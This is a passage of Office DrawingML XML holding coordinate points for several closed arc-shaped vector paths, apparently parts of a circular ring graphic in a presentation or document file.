                  <a:pt x="1114755" y="3699357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154671" y="3725468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195311" y="3750589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236649" y="3774681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1278661" y="3797744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321346" y="3819766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364665" y="3840708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1408620" y="3860584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453184" y="3879342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498346" y="3896995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1544078" y="3913505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1590382" y="3928872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1637220" y="3943070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1684591" y="3956075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1732470" y="3967886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780857" y="3978465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780857" y="3914330"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321175" h="4310380">
                <a:moveTo>
                  <a:pt x="1780857" y="331533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1732470" y="342163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1684591" y="354012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1637220" y="367068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1590382" y="381304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1544078" y="396722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498346" y="413283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453184" y="430987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1408620" y="449821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364665" y="469747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321346" y="490766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1278661" y="512851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236649" y="535990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195311" y="560171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154671" y="585368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114755" y="611555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075550" y="638746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1037107" y="666889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="999426" y="695998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="962533" y="726033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="926426" y="756983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891146" y="788835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856691" y="821575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823087" y="855179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790346" y="889635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758494" y="924915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727544" y="961021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697509" y="997915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668401" y="1035596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="640257" y="1074039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613067" y="1113243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="586879" y="1153160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561682" y="1193800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537502" y="1235138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514362" y="1277150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492277" y="1319834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471258" y="1363154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451332" y="1407109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432498" y="1451673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414794" y="1496834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398233" y="1542567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382816" y="1588871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368579" y="1635709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355523" y="1683080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343674" y="1730959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333057" y="1779333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397446" y="1779333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408546" y="1731327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420903" y="1683816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434492" y="1636826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449300" y="1590382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465302" y="1544497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482485" y="1499196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500824" y="1454480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520319" y="1410385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540931" y="1366926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="562648" y="1324114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585444" y="1281976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609320" y="1240523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="634250" y="1199781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="660209" y="1159764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687184" y="1120482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715162" y="1081963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="744118" y="1044219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774026" y="1007275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804887" y="971143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836663" y="935850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869353" y="901407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="902919" y="867841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937361" y="835152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972654" y="803376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008786" y="772515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045730" y="742607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083475" y="713651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1121994" y="685673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1161275" y="658698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201293" y="632739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242034" y="607809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283487" y="583933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1325626" y="561136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368437" y="539419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411897" y="518807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1455991" y="499313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1500708" y="480974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546009" y="463791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591894" y="447789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1638338" y="432981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1685328" y="419392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1732838" y="407035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780857" y="395922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780857" y="331533"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321175" h="4310380">
                <a:moveTo>
                  <a:pt x="3346005" y="3955859"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3292284" y="3902265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3250831" y="3928135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3208921" y="3952951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3166567" y="3976713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3123806" y="3999407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3080639" y="4021048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3037090" y="4041635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2993174" y="4061168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2948927" y="4079646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2904350" y="4097070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2859468" y="4113441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2814294" y="4128744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2768866" y="4143006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2723184" y="4156202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2677274" y="4168343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2631148" y="4179430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2584843" y="4189450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2538361" y="4198429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491727" y="4206354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2444953" y="4213212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2398077" y="4219016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2351100" y="4223766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304046" y="4227461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2256929" y="4230103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2209787" y="4231691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2162619" y="4232224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2115439" y="4231691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2068296" y="4230103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2021179" y="4227461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1974126" y="4223766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1927148" y="4219016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1880273" y="4213212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1833499" y="4206354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1786864" y="4198429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740382" y="4189450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694078" y="4179430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647952" y="4168343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602041" y="4156202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1556359" y="4143006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1510931" y="4128744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1465757" y="4113441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420876" y="4097070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1376299" y="4079646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332052" y="4061168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288135" y="4041635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244587" y="4021048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201420" y="3999407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158659" y="3976713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1116304" y="3952951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074394" y="3928135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032954" y="3902265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979233" y="3955859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020648" y="3982580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062558" y="4008247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104925" y="4032872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147737" y="4056443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1190967" y="4078973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234605" y="4100449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1278636" y="4120883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323022" y="4140263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1367751" y="4158602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412811" y="4175887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458188" y="4192130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1503845" y="4207319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549768" y="4221467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595958" y="4234561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1642364" y="4246613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688985" y="4257611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1735797" y="4267568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782787" y="4276471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829930" y="4284332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1877199" y="4291139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1924596" y="4296905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1972081" y="4301617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2019642" y="4305287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067267" y="4307903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2114931" y="4309478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2162606" y="4309999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2210295" y="4309478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257958" y="4307903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2305583" y="4305287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2353145" y="4301617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2400630" y="4296905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2448026" y="4291139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2495296" y="4284332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2542438" y="4276471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589428" y="4267568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2636240" y="4257611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2682862" y="4246613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2729268" y="4234561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775445" y="4221467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2821381" y="4207319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2867037" y="4192130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2912414" y="4175887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2957474" y="4158602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3002203" y="4140263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3046590" y="4120883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3090621" y="4100449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3134258" y="4078973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3177489" y="4056443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3220301" y="4032872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3262668" y="4008247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3304578" y="3982580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3346005" y="3955859"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321175" h="4310380">
                <a:moveTo>
                  <a:pt x="3346005" y="354139"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3304578" y="327431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3262668" y="301752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3220301" y="277139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3177489" y="253555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3134258" y="231038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3090621" y="209550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3046590" y="189128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3002203" y="169735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2957474" y="151409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2912414" y="134112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2867037" y="117881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2821381" y="102679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775458" y="88544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2729268" y="75438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2682862" y="63398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2636240" y="52387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589428" y="42443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2542438" y="33528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2495296" y="25679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2448026" y="18859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2400630" y="13106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2353145" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2305583" y="4724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257958" y="2095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2210295" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2162619" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2114931" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067267" y="2095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2019642" y="4724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1972081" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1924596" y="13106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1877199" y="18859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829930" y="25679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782787" y="33528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1735797" y="42443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688985" y="52387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1642364" y="63398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595958" y="75438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549781" y="88544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1503845" y="102679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458188" y="117881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412811" y="134112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1367751" y="151409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323022" y="169735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1278636" y="189128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234605" y="209550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1190967" y="231038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147737" y="253555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104925" y="277139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062558" y="301752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020648" y="327431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979233" y="354139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032954" y="407733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074394" y="381876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1116304" y="357060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158659" y="333298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201420" y="310603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244587" y="288963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288135" y="268376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332052" y="248843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1376299" y="230365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420876" y="212940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1465757" y="196570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1510931" y="181267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1556359" y="167005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602041" y="153809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647952" y="141668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694078" y="130581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740382" y="120561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1786864" y="111582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1833499" y="103657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1880273" y="96799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1927148" y="90995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1974126" y="86245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2021179" y="82550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2068296" y="79908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2115439" y="78320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2162606" y="77787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2209787" y="78320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2256929" y="79908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304046" y="82550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2351100" y="86245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2398077" y="90995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2444953" y="96799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491727" y="103657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2538361" y="111582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2584843" y="120561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2631148" y="130581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2677274" y="141668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2723184" y="153809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2768866" y="167005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2814294" y="181267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2859468" y="196570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2904350" y="212940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2948927" y="230365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2993174" y="248843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3037090" y="268376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3080639" y="288963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3123806" y="310603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3166567" y="333298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3208921" y="357060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3250831" y="381876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3292284" y="407733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3346005" y="354139"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321175" h="4310380">
                <a:moveTo>
                  <a:pt x="3987609" y="2535237"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3923220" y="2535237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3912108" y="2583103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3899751" y="2630449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3886162" y="2677287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3871353" y="2723578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3855351" y="2769311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3838168" y="2814472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819829" y="2859036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3800335" y="2902991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3779723" y="2946311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3758006" y="2988983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3735209" y="3030982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3711333" y="3072307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3686403" y="3112922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3660444" y="3152813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3633470" y="3191967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3605492" y="3230372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3576536" y="3267989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3546627" y="3304819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3515766" y="3340836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3483991" y="3376015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3451301" y="3410356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3417735" y="3443821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3383292" y="3476409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3347999" y="3508083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3311868" y="3538855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3274923" y="3568674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3237179" y="3597529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3198660" y="3625418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159379" y="3652316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3119361" y="3678199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3078619" y="3703053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3037167" y="3726853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995028" y="3749598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2952216" y="3771252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2908757" y="3791801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2864662" y="3811232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819946" y="3829520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2774645" y="3846652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2728760" y="3862616"/>
                </a:lnTo>
                <a:lnTo>
